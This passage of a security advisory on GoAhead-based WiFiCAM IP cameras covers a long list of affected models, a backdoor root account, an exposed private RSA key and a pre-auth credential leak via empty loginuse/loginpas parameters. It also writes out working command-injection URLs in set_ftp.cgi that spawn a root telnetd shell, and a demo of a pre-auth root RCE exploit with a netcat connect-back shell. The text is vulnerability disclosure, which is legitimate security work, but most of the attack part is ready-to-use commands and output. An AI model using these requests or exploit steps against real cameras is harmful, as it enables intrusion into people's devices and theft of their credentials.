s631\r\nSunVision+US Other\r\nSunbio Other\r\nSuneyes Other\r\nSuneyes SP-T01EWP\r\nSuneyes SP-T01WP\r\nSuneyes SP-TM01EWP\r\nSuneyes SP-TM01WP\r\nSuneyes SP-tm05wp\r\nSunluxy H-264\r\nSunluxy HZCam\r\nSunluxy Other\r\nSunluxy PTZ\r\nSunluxy SL-701\r\nSupra+Space IPC\r\nSupra+Space IPC-1\r\nSupra+Space 
IPC-100AC\r\nSupra+Space IPC-10AC\r\nSupra+Space Other11\r\nSupra+Space ipc-20c\r\nSure-Eye Other\r\nSurecom LN-400\r\nSwann 005FTCD\r\nSwann 440\r\nSwann 440-IPC\r\nSwann ADS-440\r\nSwann ADS-440-PTZ\r\nSwann ADS-CAMAX1\r\nSwann Other\r\nSwann SWADS-440-IPC\r\nSwann SWADS-440IPC-AU\r\nSygonix 43176A\r\nSygonix 43558A\r\nSzneo CAM0X\r\nSzneo CoolCam\r\nSzneo NIP\r\nSzneo NIP-0\r\nSzneo NIP-02\r\nSzneo NIP-031\r\nSzneo NIP-031H\r\nSzneo NIP-06\r\nSzneo NIP-12\r\nSzneo NIP-2\r\nSzneo NIP-20\r\nSzneo NIP-210485-ABABC\r\nSzneo NIP-26\r\nSzneo NIP-X\r\nSzneo NP-254095\r\nSzneo Other\r\nSzneo TFD\r\nTAS-Tech Other\r\nTechnaxx tx-23\r\nTechview GM8126\r\nTechview QC-3638\r\nTechview qc3839\r\nTemvis Other\r\nTenda C50S\r\nTenda c30\r\nTenda c5+\r\nTenvis 0012\r\nTenvis 3815\r\nTenvis 3815-W\r\nTenvis 3815W\r\nTenvis 3815W.\r\nTenvis 3815W2013\r\nTenvis IP-319W\r\nTenvis IP-319w\r\nTenvis IP-391W\r\nTenvis IP-391WHD\r\nTenvis IP-602W\r\nTenvis IP602W\r\nTenvis IPROBOT\r\nTenvis JP-3815W\r\nTenvis JPT-3814WP2P\r\nTenvis JPT-3815\r\nTenvis JPT-3815-P2P\r\nTenvis JPT-3815W\r\nTenvis JPT-3815W+\r\nTenvis JPT-3815WP2P\r\nTenvis JPT-3815w\r\nTenvis JPT-3818\r\nTenvis MINI-319W\r\nTenvis Mini-319\r\nTenvis Other\r\nTenvis PT-7131W\r\nTenvis TH-661\r\nTenvis TR-3818\r\nTenvis TR-3828\r\nTenvis TR3815W\r\nTenvis TZ100\r\nTenvis TZ100/IPROBOT3\r\nTenvus JPG3815W\r\nThreeboy IP-660\r\nTopcam SL-30IPC01Z\r\nTopcam SL-720IPC02Z\r\nTopcam SL-910IW30\r\nTopica+CCTV Other\r\nTrivision NC-335PW-HD-10\r\nTrust NW-7500\r\nTurbo+X Endurance\r\nTurbo+X IIPC-20\r\nUokoo 720P\r\nVCatch Other\r\nVCatch VC-MIC720HK\r\nValtronics IP\r\nValtronics Other\r\nVandesc IP900\r\nVantech Other\r\nVantech PTZ\r\nVideosec+Security IPC-103\r\nVideosec+Security IPP-105\r\nVimicro Other\r\nVitek+CCTV Other\r\nVstarcam 7823\r\nVstarcam C-7824WIP\r\nVstarcam C-7833WIP-X4\r\nVstarcam C-7833wip\r\nVstarcam C-7837WIP\r\nVstarcam C-7838WIP\r\nVstarcam C50S\r\nVstarcam C7816W\r\nVstarcam C7824WIP\r\nVstarcam 
C782WIP\r\nVstarcam C7842WIP\r\nVstarcam C93\r\nVstarcam C=7824WIP\r\nVstarcam Cam360\r\nVstarcam F-6836W\r\nVstarcam H-6837WI\r\nVstarcam H-6837WIP\r\nVstarcam H-6850\r\nVstarcam H-6850WIP\r\nVstarcam H-6850wip\r\nVstarcam ICAM-608\r\nVstarcam Other\r\nVstarcam T-6835WIP\r\nVstarcam T-6836WTP\r\nVstarcam T-6892wp\r\nVstarcam T-7815WIP\r\nVstarcam T-7833WIP\r\nVstarcam T-7833wip\r\nVstarcam T-7837WIP\r\nVstarcam T-7838WIP\r\nVstarcam T-7892WIP\r\nVstarcam T6836WTP\r\nVstarcam T7837WIP\r\nVstarcam c7815wip\r\nVstarcam c7833wip\r\nVstarcam c7850wip\r\nWanscam 00D6FB01980F\r\nWanscam 106B\r\nWanscam 118\r\nWanscam 541-W\r\nWanscam 543-W\r\nWanscam 790\r\nWanscam AJ-C0WA-198\r\nWanscam AJ-C0WA-B106\r\nWanscam AJ-C0WA-B116\r\nWanscam AJ-C0WA-B168\r\nWanscam AJ-C0WA-B1D8\r\nWanscam AJ-C0WA-C0D8\r\nWanscam AJ-C0WA-C116\r\nWanscam AJ-C0WA-C126\r\nWanscam AJ-C2WA-B118\r\nWanscam AJ-C2WA-C116\r\nWanscam AJ-C2WA-C118\r\nWanscam AJ-C2WA-C198\r\nWanscam AJ-COWA-B1D8\r\nWanscam AJ-COWA-C116\r\nWanscam AJ-COWA-C126\r\nWanscam AJ-COWA-C128\r\nWanscam AW00004J\r\nWanscam B1D8-1\r\nWanscam C-118\r\nWanscam C-126\r\nWanscam Colour\r\nWanscam FI-18904w\r\nWanscam FR-4020A2\r\nWanscam FR4020A2\r\nWanscam HD-100W\r\nWanscam HW-0021\r\nWanscam HW-0022\r\nWanscam HW-0022HD\r\nWanscam HW-0023\r\nWanscam HW-0024\r\nWanscam HW-0025\r\nWanscam HW-0026\r\nWanscam HW-0028\r\nWanscam HW-0033\r\nWanscam HW-0036\r\nWanscam HW-0038\r\nWanscam HW-0039\r\nWanscam HW-22\r\nWanscam HW0030\r\nWanscam IP\r\nWanscam JW-0001\r\nWanscam JW-0003\r\nWanscam JW-0004\r\nWanscam JW-0004m\r\nWanscam JW-0005\r\nWanscam JW-0006\r\nWanscam JW-0008\r\nWanscam JW-0009\r\nWanscam JW-0010\r\nWanscam JW-0011\r\nWanscam JW-0011l\r\nWanscam JW-0012\r\nWanscam JW-0018\r\nWanscam JW-004\r\nWanscam JW-009\r\nWanscam JW-CD\r\nWanscam JW000008\r\nWanscam JW0009\r\nWanscam JW001\r\nWanscam JW0012\r\nWanscam JW008\r\nWanscam JWEV\r\nWanscam JWEV-011777-NSRVV\r\nWanscam JWEV-011921-RXSXT\r\nWanscam JWEV-360171-BBEAC\r\nWanscam 
JWEV-380096-CECDB\r\nWanscam JWEV-PEPLOW\r\nWanscam NBC-543W\r\nWanscam NC-530\r\nWanscam NC-541\r\nWanscam NC-541/W\r\nWanscam NC-541W\r\nWanscam NC-541w\r\nWanscam NC-543W\r\nWanscam NCB-534W\r\nWanscam NCB-540W\r\nWanscam NCB-541W\r\nWanscam NCB-541WB\r\nWanscam NCB-543W\r\nWanscam NCBL-618W\r\nWanscam NCH-532MW\r\nWanscam NCL-610W\r\nWanscam NCL-612W\r\nWanscam NCL-616W\r\nWanscam NCL-S616W\r\nWanscam Other\r\nWanscam TG-002\r\nWanscam WJ-0004\r\nWanscam WX-617\r\nWanscam Works\r\nWanscam XHA-120903181\r\nWanscam XHA-4020a2\r\nWanscam __PTZ\r\nWanscam chiOthernese\r\nWanscam ip\r\nWanscam jw0005\r\nWanscam jw0010\r\nWansview 541\r\nWansview 625W\r\nWansview MCM-627\r\nWansview N540w\r\nWansview NCB-534W\r\nWansview NCB-541W\r\nWansview NCB-541w\r\nWansview NCB-543W\r\nWansview NCB541W\r\nWansview NCB545W\r\nWansview NCL-610W\r\nWansview NCL610D04\r\nWansview NCL614W\r\nWansview Other\r\nWansview dcs543w\r\nWansview nc543w\r\nWardmay+CCTV WDM-6702AL\r\nWatch+bot+Camera resup\r\nWebcamXP Other\r\nWinBook Other\r\nWinBook T-6835\r\nWinBook T-6835WIP\r\nWinBook T-7838\r\nWinic NVT-530004\r\nWise+Group Other\r\nX-Price Other\r\nX10 39A\r\nX10 AIRSIGHT\r\nX10 AirSight\r\nX10 Airsight\r\nX10 Jake\r\nX10 Other\r\nX10 XC-38A\r\nX10 XX-36A\r\nX10 XX-39A\r\nX10 XX-56A\r\nX10 XX-59A\r\nX10 XX-60\r\nX10 XX-69A\r\nX10 XX41Ahome\r\nXVision Other\r\nXXCamera 53100\r\nXXCamera 5330-E\r\nXXCamera Other\r\nXXCamera XXC-000723-NJFJD\r\nXXCamera XXC-092411-DCAFC\r\nXXCamera XXC-50100-H\r\nXXCamera XXC-50100-T\r\nXXCamera XXC-5030-E\r\nXXCamera XXC-53100-T\r\nXXCamera XXC52130\r\nXin+Ling Other\r\nYawcam Other\r\nZilink Other\r\nZmodo CMI-11123BK\r\nZmodo IP-900\r\nZmodo Other\r\nZodiac+Security 909\r\nZodiac+Security Other\r\nZoneway NC638MW-P\r\nZyXEL Other\r\nalexim Other\r\nalexim cam22822\r\nalias Other\r\nall+in+one+ Other\r\nall+in+one+ b1\r\nall-in-one Other\r\nallecto DVC-150IP\r\napc Other\r\nasw-006 Other\r\nboh l\r\nbravo Other\r\nbush+plus BU-300WF\r\nccam p2p\r\nchina 
8904W\r\nchina HDIPCAM\r\nchina IPCAM\r\nchina Other\r\nchina PTZCAM\r\nchina np-02\r\nciana+exports antani\r\ncina Other\r\ncoolead L\r\ncoolead L610WS\r\ndax Other\r\ndenver IPC-320\r\ndenver IPO-320\r\ne-landing 720p\r\neScam QF100\r\nebw Other\r\nepexis PIPCAMHD82\r\nepexis pipcam5\r\nesecure nvp\r\ngeeya C602\r\ngeeya P2P\r\ngeeya c801\r\nhdcam Other\r\nhomeguard 720P\r\nhomeguard Other\r\nhomeguard Wireless\r\nhomeguard wifi\r\niView ID002A\r\niView Other\r\ninsteon 75790\r\ninsteon 75790wh\r\ninsteon High\r\ninsteon Other\r\ninsteon Wireless\r\niuk 5A1\r\nivision hdwificam\r\niwitness bullet\r\njwt Other\r\njyacam JYA8010\r\nkadymay KDM-6800\r\nkadymay KDM6702\r\nkadymay KMD-6800\r\nkadymay Other\r\nkang+xun xxc5030-t\r\nkines Other\r\nkiocong 1601\r\nkiocong 1602\r\nkiocong 1609\r\nkiocong Other\r\nkodak 201pl\r\nkoicong 1601\r\nl+series CAM0758\r\nl+series CAM0760\r\nl+series Other\r\nl+series V100\r\nlogan n8504hh\r\nmeyetech 095475-caeca\r\nmeyetech 188091-EFBAE\r\nmeyetech Other\r\nmeyetech WirelessCam\r\nmicasaverde VistaCamSD\r\npipcam HD17\r\npni 941w\r\npni IP451W\r\npni IP541W\r\npni IP941W\r\npni IP951W\r\npni Other\r\npnp IP\r\npnp Other\r\nsemac Other\r\nskylink WC-300PS\r\nstorex D-10H\r\n\r\n```\r\n\r\n[Shodan lists 185 000 vulnerable cameras](https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41).\r\n\r\n<a id=\"backdoor-account\"></a>\r\n\r\n## Details - Backdoor account\r\n\r\nBy default, telnetd is running on the camera.\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\napk-link login: admin\r\nPassword:\r\n\r\ntelnet> q\r\nConnection closed.\r\nuser@kali$\r\n\r\n```\r\n\r\nOne backdoor account exists in the camera:\r\n\r\n```\r\nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh\r\n\r\n```\r\n\r\n\r\n\r\n## Details - RSA key and certificates\r\n\r\nThe `/system/www/pem/ck.pem` contains an Apple certificate with a private 
RSA key:\r\n\r\n```\r\n/ # cat /system/www/pem/ck.pem \r\nBag Attributes\r\n friendlyName: Apple Production IOS Push Services: com.app.camera\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US\r\nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority\r\n-----BEGIN CERTIFICATE-----\r\n[...]\r\n-----END CERTIFICATE-----\r\nBag Attributes\r\n friendlyName: andrew\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nKey Attributes: <No Attributes>\r\n-----BEGIN RSA PRIVATE KEY-----\r\n[...]\r\n-----END RSA PRIVATE KEY-----\r\n\r\n```\r\n\r\n<a id=\"pre-auth-info-leak-goahead\"></a>\r\n\r\n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server\r\n\r\nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:\r\n\r\n* htdigest authentication OR\r\n* authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).\r\n\r\nBy default, the web directory contains symbolic links to configuration files (`system.ini` and `system-b.ini` contain credentials):\r\n\r\n```\r\n/tmp/web # ls -la *ini\r\nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini\r\nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini\r\n/tmp/web #\r\n\r\n```\r\n\r\nWith valid credentials, an attacker can retrieve the configuration, as shown below:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd\r\n\r\n[...]\r\n000001d0: ffff ffff 
ffff ffff ffff ffff ffff ffff ................\r\n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X\r\n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis\r\n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........\r\n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................\r\n[...]\r\nuser@kali$\r\n\r\n```\r\n\r\nTo browse `.cgi` files, an attacker needs to authenticate too:\r\n\r\n```\r\nuser@kali$ wget -qO- 
'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'\r\nvar result=\"Auth Failed\";\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'\r\nvar result=\"Auth Failed\";\r\n\r\n```\r\n\r\nBut it appears access to `.ini` files is not correctly checked. The attacker can bypass the authentication by providing an empty `loginuse` and an empty `loginpas` in the URI:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less\r\n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........\r\n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n[...]\r\n\r\n```\r\n\r\nA PoC is provided:\r\n\r\n```\r\n./expl 192.168.1.107 --get-config | xxd | grep 000003\r\n\r\n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass\r\n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................\r\n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................\r\n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003c0: 0000 0000 0000 0000
0000 6164 6d69 6e00 ..........admin.\r\n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................\r\n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................\r\n\r\n```\r\n\r\nThis vulnerability allows an attacker to steal credentials, ftp accounts and smtp accounts (email).\r\n\r\n<a id=\"root-rce\"></a>\r\n\r\n## Details - Authenticated RCE as root\r\n\r\nAn RCE exists in the ftp configuration CGI. This is well-documented as shown [here](https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html) and [here](https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/) in several different camera models.\r\n\r\nThe partition `/` is mounted read-only, so modifications are not possible in this partition.\r\n\r\nThe command injection is located in `set_ftp.cgi` (see `$(ftp x.com)`):\r\n\r\n```\r\nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0\r\nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin\r\n\r\n```\r\n\r\nWhen doing a tcpdump, we can see the DNS resolution for x.com:\r\n\r\n```\r\n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com.
(23)\r\n\r\n```\r\n\r\nSo, `ftp x.com` is executed.\r\n\r\nWe can use the telnetd binary to start an unauthenticated telnetd access:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'\r\nuser@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'\r\n\r\n```\r\n\r\nTesting this will give us a root account on port 25/tcp:\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107 25\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\n/ # id\r\nuid=0(root) gid=0\r\n/ # uname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\n/ # mount\r\nrootfs on / type rootfs (rw)\r\n/dev/root on / type squashfs (ro,relatime)\r\n/proc on /proc type proc (rw,relatime)\r\nsysfs on /sys type sysfs (rw,relatime)\r\ntmpfs on /dev type tmpfs (rw,relatime,size=2048k)\r\ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k)\r\ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)\r\n/dev/mtdblock3 on /system type jffs2 (rw,relatime)\r\n/ #\r\n\r\n```\r\n\r\n`/etc` is read-only, so the command injection must not write into `/etc`. The injection is located in `/tmp/ftpupload.sh`:\r\n\r\n```\r\n/ # cat /tmp/ftpupload.sh \r\n/bin/ftp -n<<!\r\nopen 192.168.1.1 21\r\nuser ftp $(telnetd -l /bin/sh -p 25)ftp\r\nbinary\r\nlcd /tmp\r\nput ftptest.txt\r\nclose\r\nbye\r\n!\r\n/ #\r\n\r\n```\r\n\r\n<a id=\"pre-auth-root-rce\"></a>\r\n\r\n## Details - Pre-Auth RCE as root\r\n\r\nBy combining the Pre-Auth Info Leak within the GoAhead http server vulnerability and the authenticated RCE as root, an attacker can achieve a pre-auth RCE as root on a LAN or on the Internet.\r\n\r\nAn exploit is provided and can be used to get a root RCE with connect-back.\r\n\r\nThe exploit will:\r\n\r\n1.
extract the valid credentials by connecting to the remote GoAhead HTTP server of the targeted camera\r\n2. plant a connect-back with `nc`\r\n3. execute the payload\r\n4. the attacker will receive a root shell with netcat on a second terminal\r\n5. clean the payload located in the configuration file\r\n\r\nIt affects 1250+ camera models.\r\n\r\nDemo:\r\n\r\n```\r\nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 \r\nCamera 0day root RCE with connect-back @PierreKimSec\r\n\r\nPlease run `nc -vlp 1337` on 192.168.1.1\r\n\r\n[+] bypassing auth ... done\r\n login = admin\r\n pass = admin\r\n[+] planting payload ... done\r\n[+] executing payload ... done\r\n[+] cleaning payload ... done\r\n[+] cleaning payload ... done\r\n[+] enjoy your root shell on 192.168.1.1:1337\r\nuser@kali$\r\n\r\n```\r\n\r\nOn the second xterm:\r\n\r\n```\r\nuser@kali$ nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n192.168.1.107: inverse host lookup failed: Unknown host\r\nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968\r\nid\r\nuid=0(root) gid=0\r\nuname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\nps \r\nPID USER TIME COMMAND\r\n 1 root 0:01 {linuxrc} init\r\n 2 root 0:00 [kthreadd]\r\n 3 root 0:00 [ksoftirqd/0]\r\n 5 root 0:00 [kworker/0:0H]\r\n 6 root 0:00 [kworker/u2:0]\r\n 7 root 0:00 [rcu_preempt]\r\n 8 root 0:00 [rcu_bh]\r\n 9 root 0:00 [rcu_sched]\r\n 10 root 0:00 [watchdog/0]\r\n 11 root 0:00 [khelper]\r\n 12 root 0:00 [writeback]\r\n 13 root 0:00 [bioset]\r\n 14 root 0:00 [kblockd]\r\n 15 root 0:00 [khubd]\r\n 16 root 0:00 [kworker/0:1]\r\n 17 root 0:00 [cfg80211]\r\n 18 root 0:00 [rpciod]\r\n 19 root 0:00 [kswapd0]\r\n 20 root 0:00 [fsnotify_mark]\r\n 21 root 0:00 [nfsiod]\r\n 22 root 0:00 [crypto]\r\n 36 root 0:00 [kworker/u2:1]\r\n 39 root 0:00 [i2s_work_1]\r\n 40 root 0:00 [i2s_codec_irq_w]\r\n 41 root 0:00 [kworker/0:2]\r\n 42 root 0:00 [deferwq]\r\n 43 root 0:00 [kworker/0:1H]\r\n 59 root 0:00 
[jffs2_gcd_mtd3]\r\n 61 root 0:00 telnetd\r\n 69 root 0:00 /system/system/bin/wifidaemon\r\n 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100\r\n 98 root 0:01 [RtmpTimerTask]\r\n 99 root 0:00 [RtmpMlmeTask]\r\n 100 root 0:00 [RtmpCmdQTask]\r\n 101 root 0:00 [RtmpWscTask]\r\n 148 root 1:19 /tmp/encoder\r\n 164 root 0:00 [irq/37-isp]\r\n 236 root 0:07 [apical_isp_fw_p]\r\n 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt\r\n 2331 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2332 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2333 root 0:00 /bin/ftp -n\r\n 2334 root 0:00 /bin/sh\r\n 2439 root 0:00 ps\r\n\r\n```\r\n\r\nDetails -- Misc - \"Cloud\" (Aka Botnet)\r\nBy default, the camera uses a 'Cloud' functionality.\r\n\r\nYou can tcpdump the traffic of the camera, which is very scary:\r\n```\r\n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. 
(39)\r\n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46\r\n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28\r\n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)\r\n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n```\r\n\r\nThe camera tries to resolve `www.baidu.com` and `openapi.xg.qq.com`, and contacts hardcoded IPs and hosts:\r\n\r\n* `121.42.208.86:32100/udp` (CN: Alibaba),\r\n* `54.221.213.97:32100/udp` (AWS US),\r\n* `120.24.37.48:32100/udp` (CN: Alibaba),\r\n* `www.baidu.com:80/tcp` (CN: Baidu).\r\n\r\nIt appears this is the 'Cloud' functionality, enabled by default. The security of this functionality is not proven.\r\n\r\nThe provided Android application to manage my camera is [object.p2pwificam.client.apk](https://play.google.com/store/apps/details?id=object.p2pwificam.client).\r\n\r\n\r\n\r\n\r\n\r\nNetcam 360 works too:\r\n\r\n\r\n\r\nIt appears the network protocol is very weak:\r\n\r\n1. the camera contacts a remote server using UDP,\r\n2. the application contacts a remote server using UDP,\r\n3. the application sends a request to the remote server, asking if the camera with the specific serial-number is online,\r\n4. the server will reply with \"camera doesn't exist\", \"camera is offline\" or \"camera is online\",\r\n5.
if the camera is online, a UDP tunnel is automatically established between the application and the camera, using the Cloud server as a relay.\r\n\r\n### UDP tunnel:\r\n\r\n```\r\n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]\r\n\r\n```\r\n\r\nThen, the UDP tunnel is used by the application to reach the camera:\r\n\r\n1/ the client will send an HTTP request to the camera with the credentials (still in clear-text)\r\n\r\n```\r\nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nor\r\n\r\n```\r\nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\n2/ the camera will reply by using HTTP over UDP whether the credentials are valid or invalid.\r\n\r\nIf the credentials are valid, the camera will reply:\r\n\r\n```\r\nresult= 0;\r\n\r\n```\r\n\r\nIf the credentials are not valid, the camera will reply:\r\n\r\n```\r\nresult=-1\r\n\r\n```\r\n\r\n3/ if the credentials are valid, then the application will send HTTP requests to .cgi files hosted by the camera by appending credentials to the requests (`?loginuse=valid_user&loginpas=valid_pass`)\r\n\r\n### Step 2 in detail:\r\n\r\nIf the authentication is OK, all the configuration can be dumped in cleartext!\r\n\r\n\r\n\r\nNote: this trace was done with one of the applications listed below, to be sure applications are sharing the same \"cloud\" network (it appears the daemon running on the camera doesn't strictly respect the HTTP protocol - note the lack of `/` - but it works!).\r\n\r\nIf the authentication is not OK.
